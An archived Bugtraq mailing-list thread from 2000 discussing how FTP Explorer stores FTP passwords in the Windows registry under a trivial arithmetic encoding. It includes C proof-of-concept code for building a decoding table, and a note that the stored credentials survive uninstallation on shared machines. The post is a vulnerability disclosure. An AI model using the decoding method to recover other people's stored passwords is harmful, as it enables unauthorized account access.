[14067] in bugtraq
Re: How the password could be recover using FTP Explorer's
daemon@ATHENA.MIT.EDU (Rishi Lee Khan)
Mon Feb 28 15:01:03 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.SOL.4.05.10002280127400.7894-100000@copland.udel.edu>
Date: Mon, 28 Feb 2000 01:30:19 -0500
Reply-To: Rishi Lee Khan <rishi@UDEL.EDU>
From: Rishi Lee Khan <rishi@UDEL.EDU>
X-To: Seth R Arnold <sarnold@WILLAMETTE.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000225172002.R1123@willamette.edu>
I've notice the similar behavior, and in fact, I've used it to decyrpt
passwords I've forgotten. However, I DO think that it is a security hole
that when you uninstall this software, it does NOT delete the registry
entries. Therefore, if one installs FTP Explorer on a machine that
previously had it installed, all of the old passwords and accounts are
still there. So you can log into someone else's stuff. This is especially
a concern here at the University of Delaware as many people install and
remove shareware from public computing sites.
-Rishi
On Fri, 25 Feb 2000, Seth R Arnold wrote:
> Nelson, excuse my asking, but .. is this not the expected behavior?
>
> Any client that stores login/password information must store it in a
> plain-text equivalent form on the hard drive, *unless it prompts the
> user for a key with which to unlock the information*. Unless it uses a
> key supplied by the user, it must be based on something similar to this.
>
> If FTP Explorer is actually a server, then this is insecure -- servers
> should store hashes of passwords, not passwords. If FTP Explorer is an
> ftp client, one would hope it documents the storing of passwords; to my
> way of thinking, not prompting for passwords the next time a site is
> used is documentation enough for anyone that cares about their security.
> Anyone for whom this isn't enough likely doesn't care about their
> security.
>
> If you are worried about other people on your machine getting at the
> password through the registry, then I would hope the security settings
> on the registry are setup to disallow access -- but that would be WinNT
> only.
>
> Don't get me wrong -- this is good detective work. However, to my way of
> thinking, this is also expected behavior.
>
> Flames welcome. Autoreplies "I am out of the office" are not. :)
>
> On Thu, Feb 24, 2000 at 09:18:52PM -0300, Nelson wrote:
> > The scene:
> > user -> nelson
> > pass -> ABC
> >
> > ON Connect Window, typed login == nelson and pass == ***(ABC), made a
> > connection in my own ftp server. After this, I found this KEY in Windows
> > REGISTRY:
> > HKEY_CURRENT_USER -> Software -> FTP Explorer -> Profiles -> MY_OWN_SERVER
> >
> > and I found two values:
> > Login = nelson
> > Type = 4A4E52
> >
> > Hmmm... looks like a encrypted password to me...
> >
> > Ok, the crypt function in FTP Explorer works like that:
> > get the ascii hexa value and increment 9, if the position in password was
> > changed, increment 3 per position.
> >
> > IN order words, a progression arithmetical.
> >
> > I made a code to proof this, look the result:
> > unreal:~/temp$ ./ftpe-crypt -t 3 -i 9 -r 3 -s teste
> > Criptografia do FTP Explorer v0.6b - por Nelson Brito
> > unreal:~/temp$ more teste
> > [...]
> > A = 4A = 4D = 50
> > `-> correct
> > B = 4B = 4E = 51
> > `-> correct
> > C = 4C = 4F = 52
> > `-> correct
> > [...]
> >
> > Well, the password is 'ABC'... Is it a big security hole? I think so...
> >
> > PS: The credits to begin this thread in BOS-Br<bos@sekure.org> goes to
> > Hever<Hever@vitech.net>.
> >
> > PPS: Sorry about my poor ENGLISH. If don't understand, don't read. =)
> >
> > My proof...
> >
> > -------begin
> > /*
> > ** Este codigo demostra como funciona a "criptografia" do software FTP
> > ** Explorer, levando-se em consideracao as informacoes passadas para a
> > ** BOS-Br por Hever<Hever@vitech.net>.
> > **
> > ** author: Nelson Brito
> > ** e-mails: nelson@sekure.org & nelson@secunet.com.br
> > ** program: ftpe-crypt.c
> > **
> > ** ChangeLog:
> > ** v 0.6b - arquivo de destino incluido(output file)
> > ** - apartir desta versao sera' necessario a utilizacao de todos os
> > ** argumentos na linha de comando
> > ** v 0.5b - incluido opcoes longas na linha de comando
> > ** - problemas da opcao '-h' corrigidos gracas a fpm :*( ) )
> > ** v 0.4 - opcoes de linha de comando acrescentadas, permitindo que o
> > ** usuario "set" suas preferencias [a.k.a. getopt(3)]
> > ** v 0.3 - adicionado argumentos passados para a funcao r2()
> > ** - contador a ser usado em r2() como argumento
> > ** v 0.2 - desenvolvimento das funcao r2() e inclusao de u_abort()) e
> > ** logo()
> > ** - o length do password foi aumentado
> > ** v 0.1 - desenvolvimento inicial do esqueleto do programa, incluindo:
> > ** > retirada dos caracteres especiais, ie, so' [a-z][A-Z][0-9]
> > ** > uma simples PA, sem utilizacao de formula ou funcao
> > **
> > ** Agradecimentos a drk, Morauder e fpm pela forca com o getopt(3). =)
> > **
> > ** Como compilar(How to compile):
> > ** lameness:~# gcc -Wall -O3 -g ftpe-crypt.c -o ftpe-crypt
> > */
> >
> > #include <stdio.h>
> > #include <signal.h>
> > #include <stdlib.h>
> > #include <getopt.h>
> > #include <unistd.h>
> > #define VERSION "0.6b"
> >
> > int r2(int n, int p, int i, int b, FILE *fp){
> > n=((n+b)+(i*p));
> > fprintf(fp, "= %X ", n);
> > return(n);
> > }
> >
> > char usage(char *p){
> > fprintf(stderr, "use: %s -l <length> -i <increment> -r <ratio> -o <output-file>\n", p);
> > fprintf(stderr, "example: %s -l 15 -i 9 -r 3 -o outlist\n", p);
> > fprintf(stderr, "options:\n\t -l, --length password's length\n");
> > fprintf(stderr, "\t -i, --increment ASCII Table's increment\n");
> > fprintf(stderr, "\t -r, --ratio PA's ratio\n");
> > fprintf(stderr, "\t -o, --output output file\n");
> > fprintf(stderr, "\nfor ftpe's criptography use r=3, i=9\n");
> > exit(0);
> > }
> >
> > int main(int ac, char **av){
> > FILE *outlist = NULL;
> >
> > register int a = 48;
> > int r = 0, inc = 0, ct = 0, op;
> >
> > printf("FTP Explorer's Criptography v%s - by Nelson Brito\n", VERSION);
> >
> > if(ac != 9) usage(av[0]);
> >
> > while(1){
> > static struct option long_options[] = {
> > {"length", 1, 0, 'l'},
> > {"ratio", 1, 0, 'r'},
> > {"increment", 1, 0, 'i'},
> > {"output", 1, 0, 'o'},
> > {0, 0, 0, 0}
> > };
> >
> > int option_index = 0;
> > op = getopt_long(ac, av, "l:r:i:o:", long_options, &option_index);
> >
> > if (op == -1) break;
> >
> > switch(op){
> > case 'l':
> > ct = atoi(optarg);
> > break;
> > case 'r':
> > r = atoi(optarg);
> > break;
> > case 'i':
> > inc = atoi(optarg);
> > break;
> > case 'o':
> > if(!(outlist=fopen(optarg, "w"))){
> > printf("unable to open %s\n", optarg);
> > exit(0);
> > }
> > break;
> > default:
> > usage(av[0]);
> > break;
> > }
> > }
> >
> > while(a < 123){
> >
> > if((a >= 58) && (a <= 64)){
> > printf("%c", (char)0);
> > a++;
> > }
> >
> > else if((a >= 91) && (a <= 96)){
> > printf("%c", (char)0);
> > a++;
> > }
> >
> > else{
> > register int c;
> >
> > fprintf(outlist, "%c ", (char)a);
> > for(c = 0 ; c < ct ; c++) r2(a, c, r, inc, outlist);
> > fprintf(outlist, "\n");
> > a++;
> > }
> >
> > }
> >
> > fclose(outlist);
> >
> > return(1);
> > }
> > -------end
> >
> > Sem mais,
> > --
> > Nelson - nb
>
> --
> Seth Arnold | http://www.willamette.edu/~sarnold/
> Hate spam? See http://maps.vix.com/rbl/ for help
> Hi! I'm a .signature virus! Copy me into
> your ~/.signature to help me spread!
>
